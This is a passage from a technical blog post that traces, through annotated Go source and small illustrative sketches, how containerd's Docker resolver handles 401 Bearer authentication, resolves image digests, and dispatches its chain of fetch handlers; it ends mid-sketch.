    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">doWithRetriesInner</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="no">nil</span><span class="p">,</span> <span class="n">lastHost</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">resp</span><span class="p">,</span> <span class="n">err</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">doWithRetriesInner</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">responses</span> <span class="p">[]</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="n">lastHost</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">do</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [10]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span>
    <span class="p">}</span>

    <span class="n">responses</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">responses</span><span class="p">,</span> <span class="n">resp</span><span class="p">)</span>
    <span class="n">retry</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">retryRequest</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">responses</span><span class="p">,</span> <span class="n">lastHost</span><span class="p">)</span> <span class="c">// [11]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">retry</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="n">r</span><span class="o">.</span><span class="n">doWithRetriesInner</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">responses</span><span class="p">,</span> <span class="n">lastHost</span><span class="p">)</span> <span class="c">// call itself again if retry == true</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If the status code of the HTTP response is 401 [12], the authorizer registers a new auth handler [13] based on the authentication information extracted from the response header.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">retryRequest</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">responses</span> <span class="p">[]</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="n">lastHost</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="kt">bool</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">last</span> <span class="o">:=</span> <span class="n">responses</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">responses</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">]</span>
    <span class="k">switch</span> <span class="n">last</span><span class="o">.</span><span class="n">StatusCode</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusUnauthorized</span><span class="o">:</span> <span class="c">// [12]</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="o">.</span><span class="n">Authorizer</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="o">.</span><span class="n">Authorizer</span><span class="o">.</span><span class="n">AddResponses</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">responses</span><span class="p">);</span> <span class="n">err</span> <span class="o">==</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
                <span class="k">return</span> <span class="no">true</span><span class="p">,</span> <span class="no">nil</span> <span class="c">// true -&gt; retry</span>
            <span class="p">}</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/authorizer.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span><span class="n">dockerAuthorizer</span><span class="p">)</span> <span class="n">AddResponses</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">responses</span> <span class="p">[]</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
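    <span class="n">last</span> <span class="o">:=</span> <span class="n">responses</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">responses</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">]</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">c</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">auth</span><span class="o">.</span><span class="n">ParseAuthHeader</span><span class="p">(</span><span class="n">last</span><span class="o">.</span><span class="n">Header</span><span class="p">)</span> <span class="p">{</span>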
        <span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">Scheme</span> <span class="o">==</span> <span class="n">auth</span><span class="o">.</span><span class="n">BearerAuth</span> <span class="p">{</span>
            <span class="c">/**
             * The response header looks like:
             * www-authenticate: Bearer realm="https://auth.docker.io/token",service="registry.docker.io",scope="repository:library/ubuntu:pull"
             * so on the next attempt the authorizer first obtains a token and then sends the request.
             */</span>
            <span class="c">// [...]</span>
            <span class="n">a</span><span class="o">.</span><span class="n">handlers</span><span class="p">[</span><span class="n">host</span><span class="p">]</span> <span class="o">=</span> <span class="n">newAuthHandler</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">client</span><span class="p">,</span> <span class="n">a</span><span class="o">.</span><span class="n">header</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">Scheme</span><span class="p">,</span> <span class="n">common</span><span class="p">)</span> <span class="c">// [13]</span>
            <span class="k">return</span> <span class="no">nil</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
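
<p>To make the challenge format concrete, here is a minimal sketch of how such a header could be split into its <code class="language-plaintext highlighter-rouge">realm</code>, <code class="language-plaintext highlighter-rouge">service</code>, and <code class="language-plaintext highlighter-rouge">scope</code> parameters. <code class="language-plaintext highlighter-rouge">parseBearerChallenge()</code> is a hypothetical helper written for illustration, not containerd's <code class="language-plaintext highlighter-rouge">auth.ParseAuthHeader()</code>, and it assumes that no quoted value contains a comma.</p>

```go
package main

import (
	"fmt"
	"strings"
)

// parseBearerChallenge is a hypothetical helper (NOT containerd's
// auth.ParseAuthHeader). It splits a `Bearer k="v",k="v"` challenge
// into a map of parameters.
// Assumption: no quoted value contains a comma, so a plain split is enough.
func parseBearerChallenge(header string) (map[string]string, bool) {
	rest, ok := strings.CutPrefix(header, "Bearer ")
	if !ok {
		return nil, false // not a Bearer challenge
	}
	params := make(map[string]string)
	for _, part := range strings.Split(rest, ",") {
		key, value, found := strings.Cut(strings.TrimSpace(part), "=")
		if !found {
			continue // skip malformed fragments
		}
		params[strings.ToLower(key)] = strings.Trim(value, `"`)
	}
	return params, true
}

func main() {
	header := `Bearer realm="https://auth.docker.io/token",service="registry.docker.io",scope="repository:library/ubuntu:pull"`
	params, ok := parseBearerChallenge(header)
	fmt.Println(ok, params["realm"], params["service"], params["scope"])
}
```

<p>A real parser also has to handle commas inside quoted values and other schemes such as Basic, which this sketch deliberately ignores.</p>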

<p>Because <code class="language-plaintext highlighter-rouge">retry</code> is true, <code class="language-plaintext highlighter-rouge">r.do(ctx)</code> is called again. This time an auth handler is registered for the host, so the request must first be authorized against the realm host (<code class="language-plaintext highlighter-rouge">auth.docker.io</code> in this case) to obtain a token. Bearer authentication is used here [14].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">do</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">authorize</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">client</span><span class="o">.</span><span class="n">Do</span><span class="p">(</span><span class="n">req</span><span class="p">)</span> <span class="c">// actually send the request</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">authorize</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="o">.</span><span class="n">Authorizer</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="o">.</span><span class="n">Authorizer</span><span class="o">.</span><span class="n">Authorize</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/authorizer.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span><span class="n">dockerAuthorizer</span><span class="p">)</span> <span class="n">Authorize</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">ah</span> <span class="o">:=</span> <span class="n">a</span><span class="o">.</span><span class="n">getAuthHandler</span><span class="p">(</span><span class="n">req</span><span class="o">.</span><span class="n">URL</span><span class="o">.</span><span class="n">Host</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">auth</span><span class="p">,</span> <span class="n">refreshToken</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ah</span><span class="o">.</span><span class="n">authorize</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">ah</span> <span class="o">*</span><span class="n">authHandler</span><span class="p">)</span> <span class="n">authorize</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">(</span><span class="kt">string</span><span class="p">,</span> <span class="kt">string</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="n">ah</span><span class="o">.</span><span class="n">scheme</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">case</span> <span class="n">auth</span><span class="o">.</span><span class="n">BearerAuth</span><span class="o">:</span>
        <span class="k">return</span> <span class="n">ah</span><span class="o">.</span><span class="n">doBearerAuth</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [14]</span>
    <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
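
<p>As a rough illustration of the Bearer flow, the sketch below builds the URL of the token request from the challenge parameters shown earlier. It assumes an anonymous pull, where the token is requested with a plain GET that carries <code class="language-plaintext highlighter-rouge">service</code> and <code class="language-plaintext highlighter-rouge">scope</code> as query parameters. <code class="language-plaintext highlighter-rouge">tokenURL()</code> is a hypothetical helper, not a function in containerd.</p>

```go
package main

import (
	"fmt"
	"net/url"
)

// tokenURL is a hypothetical helper (not part of containerd). It builds
// the URL of an anonymous token request from the challenge parameters:
// the realm is the endpoint, service and scope become query parameters.
func tokenURL(realm, service, scope string) (string, error) {
	u, err := url.Parse(realm)
	if err != nil {
		return "", err
	}
	q := u.Query()
	q.Set("service", service)
	q.Set("scope", scope)
	u.RawQuery = q.Encode() // keys are sorted, values are percent-encoded
	return u.String(), nil
}

func main() {
	u, err := tokenURL(
		"https://auth.docker.io/token",
		"registry.docker.io",
		"repository:library/ubuntu:pull",
	)
	fmt.Println(u, err)
}
```

<p>The token returned by that endpoint is then attached to the retried registry request in the <code class="language-plaintext highlighter-rouge">Authorization</code> header.</p>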

<p><code class="language-plaintext highlighter-rouge">req.doWithRetries()</code> returns the HTTP response to its caller, <code class="language-plaintext highlighter-rouge">Resolve()</code>, which <strong>extracts the <code class="language-plaintext highlighter-rouge">"Docker-Content-Digest"</code> header</strong> [15]. Finally, <code class="language-plaintext highlighter-rouge">Resolve()</code> wraps the digest, media type, and size into a descriptor [16] and returns it.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">dockerResolver</span><span class="p">)</span> <span class="n">Resolve</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="kt">string</span><span class="p">,</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">u</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">paths</span> <span class="p">{</span>
        <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">host</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">hosts</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">req</span><span class="o">.</span><span class="n">doWithRetries</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">i</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">hosts</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">dgst</span> <span class="o">==</span> <span class="s">""</span> <span class="p">{</span>
                <span class="n">dgstHeader</span> <span class="o">:=</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span><span class="p">(</span><span class="n">resp</span><span class="o">.</span><span class="n">Header</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="s">"Docker-Content-Digest"</span><span class="p">))</span> <span class="c">// [15]</span>
                <span class="n">dgst</span> <span class="o">=</span> <span class="n">dgstHeader</span>
            <span class="p">}</span>
            <span class="c">// [...]</span>
            <span class="n">desc</span> <span class="o">:=</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{</span> <span class="c">// [16], for ubuntu:24.04</span>
                <span class="n">Digest</span><span class="o">:</span>    <span class="n">dgst</span><span class="p">,</span>        <span class="c">// "sha256:c4a8d5503dfb2a3eb8ab5f807da5bc69a85730fb49b5cfca2330194ebcc41c7b"</span>
                <span class="n">MediaType</span><span class="o">:</span> <span class="n">contentType</span><span class="p">,</span> <span class="c">// "application/vnd.oci.image.index.v1+json"</span>
                <span class="n">Size</span><span class="o">:</span>      <span class="n">size</span><span class="p">,</span>        <span class="c">// 6688</span>
            <span class="p">}</span>
            <span class="k">return</span> <span class="n">ref</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="no">nil</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we know how <code class="language-plaintext highlighter-rouge">dockerd</code> handles the response when the registry server returns 401, and what the first request looks like when you pull an image.</p>

<p>The flow is as follows:</p>

<p><img src="/assets/image-20260601000000001.png" alt="image-20260601000000001" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h3 id="13-get-image-index">1.3. GET Image Index</h3>

<p>Once we get the first descriptor, we can start to <strong>fetch the raw data</strong> from the registry server.</p>

<p>The fetching pipeline is built in two layers: <strong>handlers</strong> and <strong>decorators</strong>. A handler works as a hook function [1], and a handler may be wrapped by several decorators. For example, <code class="language-plaintext highlighter-rouge">childrenHandler</code> is wrapped by up to five decorators [2], all chained together into the final handler.</p>

<p>When <code class="language-plaintext highlighter-rouge">images.Dispatch()</code> [3] is called, the handlers are invoked in the order in which they were registered.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/client/pull.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">rCtx</span> <span class="o">*</span><span class="n">RemoteContext</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">limit</span> <span class="kt">int</span><span class="p">)</span> <span class="p">(</span><span class="n">images</span><span class="o">.</span><span class="n">Image</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">name</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">Resolver</span><span class="o">.</span><span class="n">Resolve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ref</span><span class="p">)</span>
    <span class="c">// returned desc = { Digest: sha256:c4a8...1c7b, MediaType: &lt;type&gt;, Size: N }</span>
    <span class="c">// [...]</span>
    
    <span class="c">// ============ fetching pipeline ============</span>
    <span class="n">store</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">ContentStore</span><span class="p">()</span>
    <span class="c">// [...]</span>
    <span class="n">fetcher</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">Resolver</span><span class="o">.</span><span class="n">Fetcher</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">childrenHandler</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">ChildrenHandler</span><span class="p">(</span><span class="n">store</span><span class="p">)</span>
    
    <span class="c">// [...]</span>
    <span class="c">// [2]</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">SetReferrers</span><span class="p">(</span><span class="n">rCtx</span><span class="o">.</span><span class="n">ReferrersProvider</span><span class="p">,</span> <span class="n">childrenHandler</span><span class="p">)</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">SetChildrenMappedLabels</span><span class="p">(</span><span class="n">store</span><span class="p">,</span> <span class="n">childrenHandler</span><span class="p">,</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">ChildLabelMap</span><span class="p">)</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">remotes</span><span class="o">.</span><span class="n">FilterManifestByPlatformHandler</span><span class="p">(</span><span class="n">childrenHandler</span><span class="p">,</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">PlatformMatcher</span><span class="p">)</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">FilterPlatforms</span><span class="p">(</span><span class="n">childrenHandler</span><span class="p">,</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">PlatformMatcher</span><span class="p">)</span>
    <span class="n">childrenHandler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">LimitManifests</span><span class="p">(</span><span class="n">childrenHandler</span><span class="p">,</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">PlatformMatcher</span><span class="p">,</span> <span class="n">limit</span><span class="p">)</span>

    <span class="c">// [...]</span>
    <span class="n">convertibleHandler</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">HandlerFunc</span><span class="p">(</span>
        <span class="k">func</span><span class="p">(</span><span class="n">_</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span> <span class="o">==</span> <span class="n">docker</span><span class="o">.</span><span class="n">LegacyConfigMediaType</span> <span class="p">{</span>
                <span class="n">isConvertible</span> <span class="o">=</span> <span class="no">true</span>
            <span class="p">}</span>

            <span class="k">return</span> <span class="p">[]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{},</span> <span class="no">nil</span>
        <span class="p">},</span>
    <span class="p">)</span>

    <span class="c">// [...]</span>
    <span class="n">appendDistSrcLabelHandler</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">docker</span><span class="o">.</span><span class="n">AppendDistributionSourceLabel</span><span class="p">(</span><span class="n">store</span><span class="p">,</span> <span class="n">ref</span><span class="p">)</span>

    <span class="c">// [...]</span>
    <span class="n">handlers</span> <span class="o">:=</span> <span class="nb">append</span><span class="p">(</span> <span class="c">// [1]</span>
        <span class="n">rCtx</span><span class="o">.</span><span class="n">BaseHandlers</span><span class="p">,</span>
        <span class="n">remotes</span><span class="o">.</span><span class="n">FetchHandler</span><span class="p">(</span><span class="n">store</span><span class="p">,</span> <span class="n">fetcher</span><span class="p">),</span>
        <span class="n">convertibleHandler</span><span class="p">,</span>
        <span class="n">childrenHandler</span><span class="p">,</span>
        <span class="n">appendDistSrcLabelHandler</span><span class="p">,</span>
    <span class="p">)</span>
    <span class="n">handler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">Handlers</span><span class="p">(</span><span class="n">handlers</span><span class="o">...</span><span class="p">)</span>
    
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">handler</span><span class="p">,</span> <span class="n">limiter</span><span class="p">,</span> <span class="n">desc</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
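
<p>The decorator layering at [2] can be pictured with a simplified model. In the sketch below, <code class="language-plaintext highlighter-rouge">Descriptor</code> and <code class="language-plaintext highlighter-rouge">HandlerFunc</code> are stripped-down stand-ins for the real types, and <code class="language-plaintext highlighter-rouge">filterPlatform()</code>, <code class="language-plaintext highlighter-rouge">limit()</code>, and <code class="language-plaintext highlighter-rouge">indexChildren()</code> are hypothetical names that only mimic the idea of wrapping a handler. None of them are containerd's actual implementations.</p>

```go
package main

import "fmt"

// Descriptor and HandlerFunc are simplified stand-ins for
// ocispec.Descriptor and images.HandlerFunc (no context, fewer fields).
type Descriptor struct {
	Digest   string
	Platform string
}

type HandlerFunc func(desc Descriptor) ([]Descriptor, error)

// filterPlatform is a hypothetical decorator: it calls the wrapped
// handler and keeps only the children that match the wanted platform.
func filterPlatform(next HandlerFunc, want string) HandlerFunc {
	return func(desc Descriptor) ([]Descriptor, error) {
		children, err := next(desc)
		if err != nil {
			return nil, err
		}
		var kept []Descriptor
		for _, c := range children {
			if c.Platform == want {
				kept = append(kept, c)
			}
		}
		return kept, nil
	}
}

// limit is a second hypothetical decorator: it caps the number of children.
func limit(next HandlerFunc, n int) HandlerFunc {
	return func(desc Descriptor) ([]Descriptor, error) {
		children, err := next(desc)
		if err != nil {
			return nil, err
		}
		if len(children) > n {
			children = children[:n]
		}
		return children, nil
	}
}

// indexChildren pretends to read an image index and list its manifests.
func indexChildren(desc Descriptor) ([]Descriptor, error) {
	return []Descriptor{
		{Digest: "sha256:aaa", Platform: "linux/amd64"},
		{Digest: "sha256:bbb", Platform: "linux/arm64"},
		{Digest: "sha256:ccc", Platform: "linux/amd64"},
	}, nil
}

// buildHandler wraps the base handler step by step, like the
// repeated reassignments of childrenHandler in fetch().
func buildHandler() HandlerFunc {
	var h HandlerFunc = indexChildren
	h = filterPlatform(h, "linux/amd64")
	h = limit(h, 1)
	return h
}

func main() {
	children, err := buildHandler()(Descriptor{Digest: "sha256:index"})
	fmt.Println(children, err)
}
```

<p>Each decorator only sees the output of the handler it wraps, so the outermost wrapper runs last on the result. This is why the order of the reassignments matters.</p>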

<p><code class="language-plaintext highlighter-rouge">Dispatch()</code> calls <code class="language-plaintext highlighter-rouge">handler.Handle()</code> to walk through the chained handlers and invoke them [4]. If the composed handler returns more descriptors, <code class="language-plaintext highlighter-rouge">Dispatch()</code> is called recursively [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/images/handlers.go</span>
<span class="k">func</span> <span class="n">Dispatch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">handler</span> <span class="n">Handler</span><span class="p">,</span> <span class="n">limiter</span> <span class="o">*</span><span class="n">semaphore</span><span class="o">.</span><span class="n">Weighted</span><span class="p">,</span> <span class="n">descs</span> <span class="o">...</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">desc</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">descs</span> <span class="p">{</span>
        <span class="n">eg</span><span class="o">.</span><span class="n">Go</span><span class="p">(</span><span class="k">func</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
            <span class="n">desc</span> <span class="o">:=</span> <span class="n">desc</span>
            <span class="c">// [...]</span>
            <span class="c">// .Handle() is defined in vendor/github.com/containerd/containerd/v2/core/images/handlers.go</span>
            <span class="n">children</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">handler</span><span class="o">.</span><span class="n">Handle</span><span class="p">(</span><span class="n">ctx2</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// [4]</span>
            <span class="c">// [...]</span>
            <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">children</span><span class="p">)</span> <span class="o">&gt;</span> <span class="m">0</span> <span class="p">{</span>
                <span class="k">return</span> <span class="n">Dispatch</span><span class="p">(</span><span class="n">ctx2</span><span class="p">,</span> <span class="n">handler</span><span class="p">,</span> <span class="n">limiter</span><span class="p">,</span> <span class="n">children</span><span class="o">...</span><span class="p">)</span> <span class="c">// [5]</span>
            <span class="p">}</span>
        <span class="p">})</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
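
<p>The interplay between the composed handler and the recursion can be sketched with a toy descriptor graph. This is a simplified, sequential model: the real <code class="language-plaintext highlighter-rouge">Dispatch()</code> runs each descriptor through <code class="language-plaintext highlighter-rouge">eg.Go()</code>, while <code class="language-plaintext highlighter-rouge">chain()</code>, <code class="language-plaintext highlighter-rouge">dispatch()</code>, and <code class="language-plaintext highlighter-rouge">walk()</code> below are hypothetical names, and the graph contents are made up for illustration.</p>

```go
package main

import "fmt"

// Descriptor and HandlerFunc are simplified stand-ins for the real types.
type Descriptor struct {
	Digest string
}

type HandlerFunc func(desc Descriptor) ([]Descriptor, error)

// chain models the idea behind images.Handlers(): run every handler in
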